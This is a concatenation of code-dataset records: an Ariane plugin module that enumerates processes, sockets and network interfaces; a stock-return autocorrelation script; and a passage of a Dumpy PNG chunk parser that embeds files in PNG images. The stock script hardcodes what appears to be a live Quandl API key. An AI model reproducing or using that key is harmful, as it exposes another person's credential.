= socket.gethostbyaddr(host)[0]\n MapSocket.cached_hostbyaddr[host] = {\n 'hostbyaddr': ret,\n 'time': timeit.default_timer()\n }\n except socket.herror as e:\n MapSocket.cached_hostbyaddr[host] = {\n 'hostbyaddr': None,\n 'time': timeit.default_timer()\n }\n LOGGER.debug(str(host))\n LOGGER.debug(e.__str__())\n LOGGER.debug(traceback.format_exc())\n except OSError as e:\n MapSocket.cached_hostbyaddr[host] = {\n 'hostbyaddr': None,\n 'time': timeit.default_timer()\n }\n LOGGER.debug(str(host))\n LOGGER.debug(e.__str__())\n LOGGER.debug(traceback.format_exc())\n return ret\n\n\n\n\nclass Process(object):\n def __init__(self, mapping_id=None, is_node=True, name=None, pid=None, create_time=None, 
exe=None, cwd=None,\n cmdline=None, username=None, cpu_affinity=None, terminal=None, map_sockets=None,\n last_map_sockets=None, new_map_sockets=None, dead_map_sockets=None,\n uids=None, gids=None):\n self.mapping_id = mapping_id\n self.is_node = is_node\n self.pid = pid\n self.name = name\n self.create_time = create_time\n self.exe = exe\n self.cwd = cwd\n self.cmdline = cmdline\n self.username = username\n self.cpu_affinity = cpu_affinity\n self.terminal = terminal\n self.last_map_sockets = last_map_sockets if last_map_sockets is not None else []\n self.map_sockets = map_sockets if map_sockets is not None else []\n self.new_map_sockets = new_map_sockets if new_map_sockets is not None else []\n self.dead_map_sockets = dead_map_sockets if dead_map_sockets is not None else []\n self.uids = uids\n self.gids = gids\n\n def __eq__(self, other):\n if self.pid != other.pid or self.name != other.name or self.create_time != other.create_time:\n return False\n else:\n return True\n\n def __str__(self):\n return json.dumps(self.proc_2_json())\n\n __repr__ = __str__\n\n def proc_2_json(self):\n map_sockets_json = []\n if self.map_sockets is not None:\n for map_socket in self.map_sockets:\n map_sockets_json.append(map_socket.to_json())\n new_map_sockets_json = []\n if self.new_map_sockets is not None:\n for map_socket in self.new_map_sockets:\n new_map_sockets_json.append(map_socket.to_json())\n dead_map_sockets_json = []\n if self.dead_map_sockets is not None:\n for map_socket in self.dead_map_sockets:\n dead_map_sockets_json.append(map_socket.to_json())\n json_obj = {\n 'pid': self.pid,\n 'name': self.name,\n 'create_time': self.create_time,\n 'exe': self.exe,\n 'cwd': self.cwd,\n 'cmdline': self.cmdline,\n 'username': self.username,\n 'cpu_affinity': self.cpu_affinity,\n 'terminal': self.terminal,\n 'sockets': map_sockets_json,\n 'new_sockets': new_map_sockets_json,\n 'dead_sockets': dead_map_sockets_json,\n 'uids': self.uids,\n 'gids': self.gids,\n 'mapping_id': self.mapping_id,\n 'is_node': self.is_node\n }\n return json_obj\n\n @staticmethod\n def json_2_proc(json_obj):\n map_sockets = []\n map_sockets_json = json_obj['sockets'] if 'sockets' in json_obj else []\n for connection_json in map_sockets_json:\n map_sockets.append(MapSocket.from_json(connection_json))\n new_map_sockets = []\n new_map_sockets_json = json_obj['new_sockets'] if 'new_sockets' in json_obj else []\n for connection_json in new_map_sockets_json:\n new_map_sockets.append(MapSocket.from_json(connection_json))\n dead_map_sockets = []\n dead_map_sockets_json = json_obj['dead_sockets'] if 'dead_sockets' in json_obj else []\n for connection_json in dead_map_sockets_json:\n dead_map_sockets.append(MapSocket.from_json(connection_json))\n return Process(pid=json_obj['pid'], name=json_obj['name'], create_time=json_obj['create_time'],\n exe=json_obj['exe'], cwd=json_obj['cwd'], cmdline=json_obj['cmdline'],\n username=json_obj['username'], cpu_affinity=json_obj['cpu_affinity'],\n terminal=json_obj['terminal'], map_sockets=map_sockets, new_map_sockets=new_map_sockets,\n dead_map_sockets=dead_map_sockets, uids=json_obj['uids'], gids=json_obj['gids'],\n mapping_id=json_obj['mapping_id'], is_node=json_obj['is_node'])\n\n\nclass NicDuplex(object):\n NIC_DUPLEX_FULL = 2\n NIC_DUPLEX_HALF = 1\n NIC_DUPLEX_UNKNOWN = 0\n\n\nclass NetworkInterfaceCard(object):\n def __init__(self, nic_id=None, name=None, mac_address=None, duplex=None, speed=None, mtu=None,\n ipv4_id=None, ipv4_address=None, ipv4_subnet_addr=None, ipv4_subnet_mask=None, 
ipv4_broadcast=None,\n ipv4_fqdn=None, ipv6_address=None, ipv6_mask=None, is_default=False, in_local_routingarea=False):\n self.nic_id = nic_id\n self.name = name\n self.mac_address = mac_address\n self.duplex = duplex\n self.speed = speed\n self.mtu = mtu\n self.ipv4_id = ipv4_id\n self.ipv4_address = ipv4_address\n self.ipv4_subnet_addr = ipv4_subnet_addr\n self.ipv4_subnet_mask = ipv4_subnet_mask\n self.ipv4_broadcast = ipv4_broadcast\n self.ipv4_fqdn = ipv4_fqdn\n self.ipv6_address = ipv6_address\n self.ipv6_mask = ipv6_mask\n self.is_default = is_default\n self.in_local_routingarea = in_local_routingarea\n\n def __eq__(self, other):\n if self.nic_id != other.nic_id or self.name != other.name or self.mac_address != other.mac_address\\\n or self.duplex != other.duplex or self.speed != other.speed or self.mtu != other.mtu\\\n or self.ipv4_id != other.ipv4_id or self.ipv4_address != other.ipv4_address\\\n or self.ipv4_subnet_mask != other.ipv4_subnet_mask \\\n or self.ipv4_fqdn != other.ipv4_fqdn or self.ipv4_broadcast != other.ipv4_broadcast:\n return False\n else:\n return True\n\n def __str__(self):\n return json.dumps(self.to_json())\n\n __repr__ = __str__\n\n def to_json(self):\n json_obj = {\n 'nic_id': self.nic_id,\n 'ipv4_id': self.ipv4_id,\n 'name': self.name,\n 'mac_address': self.mac_address,\n 'duplex': self.duplex,\n 'speed': self.speed,\n 'mtu': self.mtu,\n 'ipv4_address': self.ipv4_address,\n 'ipv4_subnet_addr': self.ipv4_subnet_addr,\n 'ipv4_subnet_mask': self.ipv4_subnet_mask,\n 'ipv4_broadcast': self.ipv4_broadcast,\n 'ipv4_fqdn': self.ipv4_fqdn,\n 'ipv6_address': self.ipv6_address,\n 'ipv6_mask': self.ipv6_mask,\n 'is_default': self.is_default,\n 'in_local_routingarea': self.in_local_routingarea\n }\n return json_obj\n\n @staticmethod\n def ip_is_in_subnet(ip_address, subnet_ip, subnet_mask):\n ret = False\n if ip_address and subnet_ip and subnet_mask:\n ret = IPv4Address(ip_address) in ip_network(subnet_ip + '/' + subnet_mask)\n return ret\n\n @staticmethod\n def from_json(json_obj):\n return NetworkInterfaceCard(nic_id=json_obj['nic_id'], name=json_obj['name'],\n mac_address=json_obj['mac_address'], duplex=json_obj['duplex'],\n speed=json_obj['speed'], mtu=json_obj['mtu'],\n ipv4_address=json_obj['ipv4_address'],\n ipv4_subnet_addr=json_obj['ipv4_subnet_addr'],\n ipv4_subnet_mask=json_obj['ipv4_subnet_mask'],\n ipv4_broadcast=json_obj['ipv4_broadcast'], ipv4_fqdn=json_obj['ipv4_fqdn'],\n ipv4_id=json_obj['ipv4_id'], ipv6_address=json_obj['ipv6_address'],\n ipv6_mask=json_obj['ipv6_mask'],\n in_local_routingarea=json_obj['in_local_routingarea'])\n\n @staticmethod\n def duplex_2_string(duplex):\n if duplex == NicDuplex.NIC_DUPLEX_UNKNOWN:\n return 'UNKNOWN'\n elif duplex == NicDuplex.NIC_DUPLEX_FULL:\n return 'FULL'\n elif duplex == NicDuplex.NIC_DUPLEX_HALF:\n return 'HALF'\n else:\n return 'UNKNOWN'\n\n\nclass OperatingSystem(object):\n def __init__(self, container_id=None, osi_id=None, ost_id=None, environment_id=None, team_id=None,\n location_id=None, routing_area_ids=None, subnet_ids=None,\n hostname=None, last_nics=None, nics=None, last_processs=None, processs=None,\n new_processs=None, dead_processs=None,\n duplex_links_endpoint=None, wip_delete_duplex_links_endpoints=None, config=None):\n LOGGER.debug(\"OperatingSystem.__init__\")\n\n self.container_id = container_id\n\n self.osi_id = osi_id\n self.ost_id = ost_id\n self.location_id = location_id\n self.routing_area_ids = routing_area_ids if routing_area_ids is not None else []\n self.subnet_ids = subnet_ids if 
subnet_ids is not None else []\n self.environment_id = environment_id\n self.team_id = team_id\n\n self.config = config\n self.hostname = hostname if hostname is not None else socket.gethostname()\n self.last_nics = last_nics if last_nics is not None else []\n self.nics = nics if nics is not None else []\n self.last_processs = last_processs if last_processs is not None else []\n self.processs = processs if processs is not None else []\n self.new_processs = new_processs if new_processs is not None else []\n self.dead_processs = dead_processs if dead_processs is not None else []\n\n self.duplex_links_endpoints = duplex_links_endpoint if duplex_links_endpoint is not None else []\n self.wip_delete_duplex_links_endpoints = wip_delete_duplex_links_endpoints if wip_delete_duplex_links_endpoints is not None else []\n\n def __eq__(self, other):\n if self.osi_id != other.osi_id or self.hostname != other.hostname:\n return False\n else:\n return True\n\n def __str__(self):\n return json.dumps(self.operating_system_2_json())\n\n __repr__ = __str__\n\n def is_local(self, ip, family):\n is_local = False\n\n if ip is not None and family == \"AF_INET\":\n for nic in self.nics:\n if nic.in_local_routingarea and NetworkInterfaceCard.ip_is_in_subnet(\n ip, nic.ipv4_subnet_addr, nic.ipv4_subnet_mask\n ):\n is_local = True\n break\n\n elif ip is not None and family == \"AF_INET6\":\n destination_ipv4 = MapSocket.ipv6_2_ipv4(ip)\n if destination_ipv4 != ip:\n for nic in self.nics:\n if nic.in_local_routingarea and NetworkInterfaceCard.ip_is_in_subnet(\n destination_ipv4, nic.ipv4_subnet_addr, nic.ipv4_subnet_mask\n ):\n is_local = True\n break\n else:\n # TODO: check is ipv6 in subnet ?\n for nic in self.nics:\n if nic.in_local_routingarea and nic.ipv6_address is not None and \\\n ip == nic.ipv6_address:\n is_local = True\n break\n\n elif family == \"AF_UNIX\":\n is_local = True\n\n LOGGER.debug(str(ip) + \" is local: \" + str(is_local))\n\n return is_local\n\n def is_local_destination(self, mapping_socket):\n LOGGER.debug(\"OperatingSystem.is_local_destination\")\n return self.is_local(mapping_socket.destination_ip, mapping_socket.family)\n\n def is_local_service(self, mapping_socket):\n LOGGER.debug(\"OperatingSystem.is_local_service\")\n return self.is_local(mapping_socket.source_ip, mapping_socket.family)\n\n def need_directories_refresh(self):\n LOGGER.debug(\"OperatingSystem.need_directories_refresh\")\n if self.last_nics != self.nics:\n return True\n else:\n return False\n\n def operating_system_2_json(self):\n LOGGER.debug(\"OperatingSystem.operating_system_2_json\")\n last_nics_json = []\n for nic in self.last_nics:\n last_nics_json.append(nic.to_json())\n nics_json = []\n for nic in self.nics:\n nics_json.append(nic.to_json())\n last_processs_json = []\n for process in self.last_processs:\n last_processs_json.append(process.proc_2_json())\n processs_json = []\n for process in self.processs:\n processs_json.append(process.proc_2_json())\n new_processs_json = []\n for process in self.new_processs:\n new_processs_json.append(process.proc_2_json())\n dead_processs_json = []\n for process in self.dead_processs:\n dead_processs_json.append(process.proc_2_json())\n json_obj = {\n 'hostname': self.hostname,\n 'last_nics': last_nics_json,\n 'nics': nics_json,\n 'last_processs': last_processs_json,\n 'processs': processs_json,\n 'new_processs': new_processs_json,\n 'dead_processs': dead_processs_json,\n 'container_id': self.container_id,\n 'osi_id': self.osi_id,\n 'ost_id': self.ost_id,\n 'location_id': 
self.location_id,\n 'routing_area_ids': self.routing_area_ids,\n 'subnet_ids': self.subnet_ids,\n 'environment_id': self.environment_id,\n 'team_id': self.team_id,\n 'duplex_links_endpoints': self.duplex_links_endpoints,\n 'wip_delete_duplex_links_endpoints': self.wip_delete_duplex_links_endpoints\n }\n return json_obj\n\n @staticmethod\n def json_2_operating_system(json_obj):\n LOGGER.debug(\"OperatingSystem.json_2_operating_system\")\n last_nics_json = json_obj['last_nics'] if 'last_nics' in json_obj else []\n last_nics = []\n for last_nic_json in last_nics_json:\n last_nics.append(NetworkInterfaceCard.from_json(last_nic_json))\n\n nics_json = json_obj['nics'] if 'nics' in json_obj else []\n nics = []\n for nic_json in nics_json:\n nics.append(NetworkInterfaceCard.from_json(nic_json))\n\n last_processs_json = json_obj['last_processs'] if 'last_processs' in json_obj else []\n last_processs = []\n for last_process in last_processs_json:\n last_processs.append(Process.json_2_proc(last_process))\n\n processs_json = json_obj['processs'] if 'processs' in json_obj else []\n processs = []\n for process in processs_json:\n processs.append(Process.json_2_proc(process))\n\n new_processs_json = json_obj['new_processs'] if 'new_processs' in json_obj else []\n new_processs = []\n for process in new_processs_json:\n new_processs.append(Process.json_2_proc(process))\n\n dead_processs_json = json_obj['dead_processs'] if 'dead_processs' in json_obj else []\n dead_processs = []\n for process in dead_processs_json:\n dead_processs.append(Process.json_2_proc(process))\n\n return OperatingSystem(\n container_id=json_obj['container_id'], osi_id=json_obj['osi_id'],\n ost_id=json_obj['ost_id'], location_id=json_obj['location_id'],\n environment_id=json_obj['environment_id'], team_id=json_obj['team_id'],\n routing_area_ids=json_obj['routing_area_ids'], subnet_ids=json_obj['subnet_ids'],\n hostname=json_obj['hostname'], last_nics=last_nics, nics=nics, last_processs=last_processs,\n processs=processs, new_processs=new_processs, dead_processs=dead_processs,\n duplex_links_endpoint=json_obj['duplex_links_endpoints'],\n wip_delete_duplex_links_endpoints=json_obj['wip_delete_duplex_links_endpoints']\n )\n\n def update(self):\n LOGGER.debug(\"OperatingSystem.update\")\n self.last_nics = copy.deepcopy(self.nics)\n self.last_processs = copy.deepcopy(self.processs)\n self.sniff()\n\n def sniff(self):\n LOGGER.debug(\"OperatingSystem.sniff\")\n self.nics = []\n self.processs = []\n self.new_processs = []\n self.dead_processs = []\n\n default_nic = netifaces.gateways()['default'][netifaces.AF_INET][1]\n\n for nic_name_stat, snicstats in psutil.net_if_stats().items():\n is_default = (nic_name_stat == default_nic)\n nic = NetworkInterfaceCard(name=nic_name_stat,\n duplex=NetworkInterfaceCard.duplex_2_string(snicstats.duplex),\n speed=snicstats.speed, mtu=snicstats.mtu, is_default=is_default)\n for nic_name_snic, snic_table in psutil.net_if_addrs().items():\n if nic_name_snic == nic_name_stat:\n for snic in snic_table:\n if snic.family == psutil.AF_LINK:\n nic.mac_address = snic.address\n elif snic.family == socket.AddressFamily.AF_INET:\n nic.ipv4_address = snic.address\n if snic.address is not None and snic.netmask is not None:\n ntw_addr = ip_network(str(snic.address) + '/' +\n str(snic.netmask), strict=False).network_address\n else:\n ntw_addr = None\n if ntw_addr is not None:\n nic.ipv4_subnet_addr = str(ntw_addr)\n else:\n nic.ipv4_subnet_addr = None\n nic.ipv4_subnet_mask = snic.netmask\n nic.ipv4_broadcast = 
snic.broadcast\n if self.config is not None and self.config.local_routing_area is not None and \\\n self.config.local_routing_area.subnets.__len__() != 0:\n for subnet in self.config.local_routing_area.subnets:\n if nic.ipv4_subnet_addr == subnet.subnet_ip:\n LOGGER.debug('OperatingSystem.sniff - NIC ' + str(nic.ipv4_address) +\n ' playing in local area only.')\n nic.in_local_routingarea = True\n break\n try:\n nic.ipv4_fqdn = socket.gethostbyaddr(snic.address)[0]\n if nic.ipv4_fqdn == 'localhost' or nic.ipv4_fqdn == socket.gethostname():\n nic.ipv4_fqdn = nic_name_stat + '.' + socket.gethostname()\n except socket.herror:\n nic.ipv4_fqdn = nic_name_stat + '.' + socket.gethostname()\n elif snic.family == socket.AddressFamily.AF_INET6:\n nic.ipv6_address = snic.address\n nic.ipv6_mask = snic.netmask\n # ARIANE SERVER DO NOT MANAGE IPv6 CURRENTLY\n pass\n else:\n pass\n self.nics.append(nic)\n\n for pid in psutil.pids():\n try:\n psutil_proc = psutil.Process(pid)\n proc = Process(pid=pid, name=psutil_proc.name(), create_time=psutil_proc.create_time(),\n exe=psutil_proc.exe(), cwd=psutil_proc.cwd(), cmdline=psutil_proc.cmdline(),\n username=psutil_proc.username(),\n cpu_affinity=\n psutil_proc.cpu_affinity() if hasattr(psutil_proc, 'cpu_affinity') else None,\n terminal=psutil_proc.terminal(), uids=psutil_proc.uids().effective,\n gids=psutil_proc.gids().effective)\n\n try:\n proc_connections = psutil_proc.connections()\n except ProcessLookupError:\n proc_connections = []\n\n proc.map_sockets = []\n\n for psutil_connection in proc_connections:\n if psutil_connection.status == psutil.CONN_LISTEN or psutil_connection.status == psutil.CONN_NONE \\\n or psutil_connection.status == psutil.CONN_CLOSE:\n map_socket = MapSocket(family=MapSocket.family_2_string(psutil_connection.family),\n rtype=MapSocket.type_2_string(psutil_connection.type),\n source_ip=psutil_connection.laddr[0],\n source_port=psutil_connection.laddr[1],\n status=psutil_connection.status)\n else:\n map_socket = MapSocket(family=MapSocket.family_2_string(psutil_connection.family),\n rtype=MapSocket.type_2_string(psutil_connection.type),\n source_ip=psutil_connection.laddr[0],\n source_port=psutil_connection.laddr[1],\n destination_ip=psutil_connection.raddr[0],\n destination_port=psutil_connection.raddr[1],\n status=psutil_connection.status)\n if map_socket not in proc.map_sockets:\n proc.map_sockets.append(map_socket)\n map_socket.file_descriptors.append(psutil_connection.fd)\n LOGGER.debug(\"OperatingSystem.sniff - \" + str(psutil_connection))\n\n if proc in self.last_processs:\n for last_proc in self.last_processs:\n if last_proc == proc:\n if last_proc.mapping_id is not None:\n proc.mapping_id = last_proc.mapping_id\n proc.is_node = last_proc.is_node\n else:\n name = '[' + str(proc.pid) + '] ' + str(proc.name)\n LOGGER.debug('OperatingSystem.sniff - process not saved on DB on previous round: ' +\n name)\n self.new_processs.append(proc)\n\n proc.last_map_sockets = copy.deepcopy(last_proc.map_sockets)\n for map_socket in proc.map_sockets:\n if map_socket in proc.last_map_sockets:\n for last_map_socket in proc.last_map_sockets:\n if map_socket == last_map_socket:\n if map_socket.status == psutil.CONN_LISTEN \\\n or map_socket.status == psutil.CONN_NONE \\\n or map_socket.status == psutil.CONN_CLOSE:\n if last_map_socket.source_endpoint_id is not None:\n map_socket.source_endpoint_id = \\\n last_map_socket.source_endpoint_id\n else:\n if proc.new_map_sockets is None:\n proc.new_map_sockets = []\n 
proc.new_map_sockets.append(map_socket)\n else:\n if last_map_socket.source_endpoint_id is not None \\\n and last_map_socket.destination_endpoint_id is not None \\\n and last_map_socket.link_id is not None \\\n and last_map_socket.transport_id is not None:\n map_socket.source_endpoint_id = last_map_socket.source_endpoint_id\n map_socket.osi_id = last_map_socket.destination_osi_id\n map_socket.subnet_id = last_map_socket.destination_subnet_id\n map_socket.routing_area_id = \\\n last_map_socket.destination_routing_area_id\n map_socket.location_id = last_map_socket.destination_location_id\n map_socket.destination_endpoint_id = \\\n last_map_socket.destination_endpoint_id\n map_socket.destination_node_id = \\\n last_map_socket.destination_node_id\n map_socket.destination_container_id = \\\n last_map_socket.destination_container_id\n map_socket.link_id = last_map_socket.link_id\n map_socket.transport_id = last_map_socket.transport_id\n else:\n if proc.new_map_sockets is None:\n proc.new_map_sockets = []\n proc.new_map_sockets.append(map_socket)\n\n for map_socket in proc.last_map_sockets:\n if map_socket not in proc.map_sockets:\n if map_socket.source_endpoint_id is not None or \\\n map_socket.destination_endpoint_id is not None:\n if proc.dead_map_sockets is None:\n proc.dead_map_sockets = []\n proc.dead_map_sockets.append(map_socket)\n break\n else:\n self.new_processs.append(proc)\n\n self.processs.append(proc)\n except psutil.NoSuchProcess:\n LOGGER.debug(\"OperatingSystem.sniff - process \" + str(pid) + \" doesnt exist anymore\")\n except psutil.AccessDenied:\n LOGGER.debug(\"OperatingSystem.sniff - access denied for process \" + str(pid))\n\n for process in self.last_processs:\n if process not in self.processs:\n self.dead_processs.append(process)\n","repo_name":"echinopsii/net.echinopsii.ariane.community.plugin.procos","sub_path":"ariane_procos/system.py","file_name":"system.py","file_ext":"py","file_size_in_byte":34238,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"73"} +{"seq_id":"5050595288","text":"\n\nimport pandas as pd\nimport quandl\nimport matplotlib.pyplot as plt\nimport statsmodels.api as sm\nimport statsmodels.graphics.tsaplots as tsplots\nimport numpy as np\nimport scipy.stats as st\n\nquandl.ApiConfig.api_key='HT4ys9sgAtiAwG_VUQiu'\npd.set_option(\"display.max_rows\",10)\nStockPrices=quandl.get_table(\"WIKI/PRICES\",ticker=['IBM','MSFT','INTC','AAPL'],qopts={'columns':['ticker','date','adj_close','adj_volume']},\ndate={'gte':'1990-1-1','lte':'2017-12-31'},paginate=True)\n# StockPrices=quandl.get_table(\"WIKI/PRICES\",ticker=['TSLA'],qopts={'columns':['ticker','date','adj_close','adj_volume']},\n# date={'gte':'2000-1-1','lte':'2017 -12-31'},paginate=True)\ndf=StockPrices.pivot(index='date',columns='ticker',values='adj_close')\ndf.fillna(method='ffill')\ndf.dtypes\ndf=df.astype('float')\n\nStockReturns=df.pct_change()\nstock_prices_monthly=df.resample('M').last()\nstock_returns_monthly=stock_prices_monthly.pct_change()\nprint(stock_returns_monthly)\n\ndef auto_test(name):\n biased_acovf = sm.tsa.stattools.acovf(stock_returns_monthly[name], missing = 'drop')\n unbiased_acovf = sm.tsa.stattools.acovf(stock_returns_monthly[name], missing = 'drop', adjusted=True)\n biased_acf = sm.tsa.stattools.acf(stock_returns_monthly[name], missing = 'drop')\n unbiased_acf = sm.tsa.stattools.acf(stock_returns_monthly[name], missing = 'drop', adjusted=True)\n 
print(\"----------------------------------\"+name+\"start------------------------------\")\n print(\"biased_acovf:\",biased_acovf[:10])\n print(\"unbiased_acovf:\",unbiased_acovf[:10])\n print(\"biased_acf:\",biased_acf[:10])\n print(\"unbiased_acf:\",unbiased_acf[:10])\n print(\"----------------------------------\"+name+\" end------------------------------\")\n\n# auto_test('AAPL')\n# auto_test('TSLA') #特斯拉\n# auto_test('IBM')\n# auto_test('MSFT')\n# auto_test('INTC')\n\n\ndef test_plot(name):\n tsplots.plot_acf(stock_returns_monthly[name][1:],lags=20,alpha=0.05)\n plt.show()\n tsplots.plot_pacf(stock_returns_monthly[name][1:].values,lags=20,alpha=0.05)\n plt.show()\n# test_plot('AAPL')\n# test_plot('TSLA')\n# test_plot('IBM')\n# test_plot('MSFT')\n# test_plot('INTC')\n\ndef Jr_stat(data,q):\n data=data[len(data) % q:] #扔掉mod(q)的余数\n n=int(len(data)/q)\n data_tmp=[0]*n\n sigma_a2=sum(np.power(data,2))\n for i in range(q):\n data_tmp=data_tmp+data[i::q]\n sigma_b2=sum(np.power(data_tmp,2))\n return sigma_b2/sigma_a2-1,n\n\ndef VR_test(data,q):\n [Jr,n]=Jr_stat(data,q)\n return (1-st.norm.cdf(np.sqrt(n)*abs(Jr)))*2\n\nprint(\"IBM p_value for q=2 is \",VR_test(stock_returns_monthly['IBM'].values[1:],2))\nprint(\"MSFT p_value for q=2 is \",VR_test(stock_returns_monthly['MSFT'].values[1:],2))\nprint(\"INTC p_value for q=2 is \",VR_test(stock_returns_monthly['INTC'].values[1:],2))\nprint(\"AAPL p_value for q=2 is \",VR_test(stock_returns_monthly['AAPL'].values[1:],2))\n# print(\"TSLA p_value for q=2 is \",VR_test(stock_returns_monthly['TSLA'].values[1:],2))\n","repo_name":"ChrisInBed/StockPriceRNN","sub_path":"group_project1/group_project1.py","file_name":"group_project1.py","file_ext":"py","file_size_in_byte":2942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"20294128575","text":"\"\"\"\nThis little script demonstrates how to use ``Dumpy`` composite types.\n\nYou can use this script to list the chunks in a PNG file, or embed/extract\narbitrary files into/from PNG files. It has no dependency except ``Dumpy``\nitself.\n\nInvoke with no argument to see the full usage.\n\nSee http://www.w3.org/TR/PNG/ for the full spec of the PNG format.\n\n\"\"\"\n\n\nimport sys\nimport os\nimport argparse\nimport dumpy.config as dc\n\n# You can set the global endianness by assigning a ``struct`` endian character\n# to ``dumpy.config.ENDIAN`` **before** importing ``dumpy.types``.\n# See the documentation of the ``struct`` module for supported endians.\ndc.ENDIAN = '>' # Big endian for PNG\nimport dumpy.types as dt\n\n\n# ================== Data Structures ==================\n#\n# The PNG format is organized in different types of ``chunks``, and each\n# type has its pre-defined structure. The whole PNG structure looks like\n# this:\n#\n# PNG_FILE\n# SIGNATURE\n# CHUNK_1\n# CHUNK_2\n# CHUNK_3\n# ....\n# CHUNK_n\n#\n# The data structures defined here are to handle the signature and different\n# kinds of chunks.\n#\n\n\ndef check_png_signature(sig, _finfo):\n sig_bytes = bytes(sig)\n if sig_bytes != b'\\x89\\x50\\x4e\\x47\\x0d\\x0a\\x1a\\x0a':\n raise ValueError('Bad PNG signature: {}'.format(repr(sig_bytes)))\n\n\n# We need to define a class for each composite type. 
The class\n# has to inherit from a mapping type (Usually the built-in ``dict``)\n# and use ``dumpy.types.DumpyMeta`` as its meta class.\nclass PNGSignature(dict, metaclass=dt.DumpyMeta):\n \"\"\"This class represents the 8-byte PNG signature:\n b'\\x89\\x50\\x4e\\x47\\x0d\\x0a\\x1a\\x0a'\n \"\"\"\n\n # Each class for a composite type must have a ``__field_specs__``\n # member, to specify the fields it contains. ``__field_specs__``\n # can be any iterable that yields field specifications. Since we\n # cannot modify the field specs after the class definition, a tuple\n # is sufficient.\n __field_specs__ = (\n # A field spec is in the form ``(name, type, count, default)``.\n # You can write a tuple directly, or you can also use the convenient\n # function ``dumpy.types.field(...)`` to make the specs more clear.\n\n # Here we have a field named ``signature``, with a size of 8 bytes.\n # We can specify a validator callback for a field. When unpacking\n # binary data, the validator will be called with the unpacked field\n # value.\n dt.field('signature', dt.UInt8, count=8, validator=check_png_signature),\n )\n\n\nclass DataIHDR(dict, metaclass=dt.DumpyMeta):\n \"\"\"This class represents the PNG IHDR chunk, which stores basic\n image properties.\n \"\"\"\n\n __field_specs__ = (\n # Unspecified field counts default to 1\n # And unspecified default values default to ``dumpy.types.NoDefault``\n\n dt.field('width', dt.UInt32),\n dt.field('height', dt.UInt32),\n dt.field('bit_depth', dt.UInt8),\n dt.field('color_type', dt.UInt8),\n dt.field('compression_method', dt.UInt8),\n dt.field('filter_method', dt.UInt8),\n dt.field('interlace_method', dt.UInt8),\n )\n\n\nclass DataDEAD(dict, metaclass=dt.DumpyMeta):\n \"\"\"This class represents our custom ``deAd`` chunk, which contains\n the name and the content of a single file. The type of a ``deAd`` chunk\n is b'deAd'.\n \"\"\"\n\n __field_specs__ = (\n # Field counts and default values can be calculated on the fly.\n # Just pass a callable, and the callable will be called with the\n # object parsed so far as its sole argument, to get the proper value.\n\n # ``dumpy.types.count_of(...)`` and ``dumpy.types.counted_by(...)``\n # are two convenient functions to calculate lengths.\n\n dt.field('name_len', dt.UInt32, default=dt.count_of('name')),\n dt.field('name', dt.UInt8, count=dt.counted_by('name_len')),\n dt.field('data_len', dt.UInt32, default=dt.count_of('data')),\n dt.field('data', dt.UInt8, count=dt.counted_by('data_len')),\n )\n\n\ndef get_unknown_data_count(obj):\n \"\"\"Used by ``DataUnknown`` to determine how many data bytes are there in\n the ``data`` field.\"\"\"\n\n # All ``Dumpy`` composite objects have a ``parent`` attribute, which is a\n # weakref to the upper level object. The ``parent`` is ``None`` if the\n # object have no parent.\n\n # We are dealing with ``DataUnknown`` objects here, so the parent is a\n # ``PNGChunk`` object. 
The length of the ``data`` field in ``DataUnknown``\n # is determined by the ``length`` field in ``PNGChunk``.\n # See http://www.w3.org/TR/PNG/#5Chunk-layout\n chunk_obj = obj.parent()\n return chunk_obj['length']\n\n\nclass DataUnknown(dict, metaclass=dt.DumpyMeta):\n \"\"\"This class represents the chunk data that we don't recognize.\"\"\"\n\n __field_specs__ = (\n dt.field('data', dt.UInt8, count=get_unknown_data_count),\n )\n\n\ndef get_chunk_data_type(obj):\n \"\"\"Used by PNGChunk to determine which class to use when dealing with\n chunk data.\"\"\"\n\n # ``obj`` is a ``PNGChunk`` instance.\n # Any field with a count larger than 1, or with a dynamic count,\n # will be turned into a ``list``. Here we convert the ``type`` field to\n # ``bytes``, to ease subsequent processing.\n chunk_type = bytes(obj['type'])\n try:\n return obj.data_types[chunk_type]\n except KeyError:\n return DataUnknown\n\n\nclass PNGChunk(dict, metaclass=dt.DumpyMeta):\n __field_specs__ = (\n # The ``data`` field is always a Dumpy composite type, and each\n # composite type automatically provides a ``size`` property.\n dt.field('length', dt.UInt32, default=lambda o: o['data'].size),\n dt.field('type', dt.UInt8, count=4),\n\n # Here's a variable field type. We pass a callable to\n # ``dumpy.types.VariableType``, and this callable will be called when\n # the framework needs to determine which class to use when dealing with\n # this field. The callable works just like dynamic counts and dynamic\n # defaults.\n dt.field('data', dt.VariableType(get_chunk_data_type)),\n\n # TODO: Add a calculated default CRC value\n dt.field('crc', dt.UInt32, default=0),\n )\n\n data_types = {\n b'IHDR': DataIHDR,\n b'deAd': DataDEAD,\n }\n\n\ndef check_chunk_continue(obj):\n if len(obj['chunks']) <= 0:\n return True\n else:\n last_chunk_type = bytes(obj['chunks'][-1]['type'])\n return last_chunk_type != b'IEND'\n\n\nclass PNGFile(dict, metaclass=dt.DumpyMeta):\n __field_specs__ = (\n dt.field('signature', PNGSignature),\n dt.field('chunks', PNGChunk, count=check_chunk_continue),\n )\n\n\n# ================== Data Structures end ==================\n\n\ndef flatten_list(l):\n for e in l:\n if isinstance(e, list):\n yield from flatten_list(e)\n else:\n yield e\n\n\ndef read_png(png_file):\n with png_file:\n data = png_file.read()\n png = PNGFile.unpack_from(data, 0)\n\n # ``data`` should be empty at this point, but the PNG format seems to allow\n # trailing bytes, so save the remaining bytes, just in case.\n data = data[png.size:]\n\n return (png, data)\n\n\ndef pack_file_into_dead_chunk(extra_file):\n dead = DataDEAD()\n # Field types are checked (partially) when assigning field values:\n # 1. A field with a count larger than 1, or a dynamic count, can only be\n # assigned a sequence of Dumpy objects, or a sequence of objects that can\n # be automatically converted to Dumpy objects.\n # 2. A field with a count of 1 can only accept a single Dumpy object, or an\n # object that can be automatically converted to a Dumpy object.\n # 3. A field with a count smaller than 1 cannot be assigned any value.\n # Trying to do so will cause a ValueError. 
